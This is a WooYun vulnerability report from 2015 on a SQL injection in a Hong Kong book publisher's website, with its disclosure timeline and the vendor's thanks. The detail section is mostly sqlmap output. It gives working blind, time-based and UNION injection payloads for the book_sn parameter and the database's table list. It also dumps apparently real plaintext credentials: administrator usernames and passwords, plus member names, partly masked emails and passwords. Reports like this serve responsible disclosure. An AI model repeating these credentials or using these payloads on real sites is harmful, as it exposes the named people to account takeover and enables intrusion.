当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158799

漏洞标题:大雁出版基地sql注入/管理员会员密码均为明文(香港地區)

相关厂商:大雁出版基地

漏洞作者: 路人甲

提交时间:2015-12-07 15:04

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-09: 厂商已经确认,细节仅向厂商公开
2015-12-19: 细节向核心白帽子及相关领域专家公开
2015-12-29: 细节向普通白帽子公开
2016-01-08: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

详细说明:

http://**.**.**.**/book.php?book_sn=1115

sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: book_sn (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: book_sn=1115 AND 7198=7198
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: book_sn=1115 AND (SELECT * FROM (SELECT(SLEEP(5)))ocKY)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: book_sn=-9681 UNION ALL SELECT CONCAT(0x716b717171,0x6f43666d4b57734b6743,0x7171627171)-- 
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.12
current database:    'andbooks_db'
current user is DBA:    False
available databases [2]:
[*] andbooks_db
[*] information_schema


Database: andbooks_db
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| contactemail            | 7163    |
| keyword_book            | 4942    |
| book_img                | 4712    |
| admin_login_log         | 3277    |
| book_source_link        | 2997    |
| keyword_list            | 2371    |
| book                    | 1313    |
| admin_login_action      | 1081    |
| book_preview            | 591     |
| book_prize_link         | 529     |
| contact                 | 417     |
| lovebooks_newsletter_ch | 385     |
| orderlist               | 282     |
| newsletter_ch           | 234     |
| member                  | 233     |
| book_relate             | 168     |
| live                    | 90      |
| booknews                | 81      |
| book_source_link_ebook  | 66      |
| newsletter              | 55      |
| lovebooks_newsletter    | 40      |
| publisher_active_link   | 30      |
| contactemail_type       | 23      |
| book_type2              | 21      |
| index_banner            | 15      |
| publisher               | 13      |
| book_prize              | 12      |
| admin                   | 10      |
| book_type1              | 10      |
| orderlist_source        | 6       |
| predict                 | 5       |
| list_booktype_a         | 4       |
| list_booktype_b         | 4       |
| publisher_active        | 4       |
| book_source             | 3       |
| book_source_ebook       | 3       |
| contactus               | 3       |
| lovebooks_code          | 3       |
| mailserver_set          | 3       |
| news                    | 3       |
| aboutus                 | 2       |
| download                | 2       |
| advertisement           | 1       |
| list_contact            | 1       |
| papershowed             | 1       |
+-------------------------+---------+


Table: admin
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| name     | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
管理员表:
Database: andbooks_db
Table: admin
[10 entries]
+---------------------------------+-------------------+---------------+
| name                            | username          | password      |
+---------------------------------+-------------------+---------------+
| Administrator                   | _#@nd_books_      | @ddirfook#_   |
| 其彬                              | chipin1109        | dx88by4214    |
| 小夏                              | hsiayf            | littlehsiayf@ |


会员信息(只列出了三条数据用于证明):

Table: member
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| name     | non-numeric |
| password | non-numeric |
| press    | numeric     |
+----------+-------------+
Database: andbooks_db
Table: member
[28 entries]
+---------------+-------+-----------------------------------+----------------+
| name          | press | email                             | password       |
+---------------+-------+-----------------------------------+----------------+
|  陳銓龍          | 0     | topgun531129@**.**.**.**            | sasha0320      |
| adrian ng     | 0     | adrian5man@**.**.**.**              | enzoenzo       |
| Amandar       | 0     | zhaom04@**.**.**.**                   | lilisk57588211 |

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-09 03:03

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评价